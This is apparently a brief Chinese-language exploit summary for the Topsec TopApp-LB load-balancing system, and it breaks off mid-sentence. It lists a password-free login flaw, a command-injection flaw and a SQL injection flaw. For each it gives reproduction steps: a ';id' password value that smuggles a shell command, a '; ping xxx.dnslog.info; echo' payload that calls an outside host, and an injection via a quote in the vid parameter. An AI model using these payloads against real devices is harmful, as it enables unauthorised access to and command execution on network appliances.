天融信TopApp-LB 負載均衡系統漏洞總結

0x00 漏洞描述 1、天融信負載均衡TopApp-LB系統無需密碼直接登陸 2、天融信TopApp-LB負載均衡命令執行漏洞 3、天融信TopApp-LB 負載均衡系統Sql注入漏洞 0x01 漏洞復現  1、使用poc::用戶名隨意  密碼:;id 2、使用poc:; ping xxx.dnslog.info; echo 3.1、抓包  3.2、vid參數加單引號,報錯 3.3、使用or 1=
相關文章
相關標籤/搜索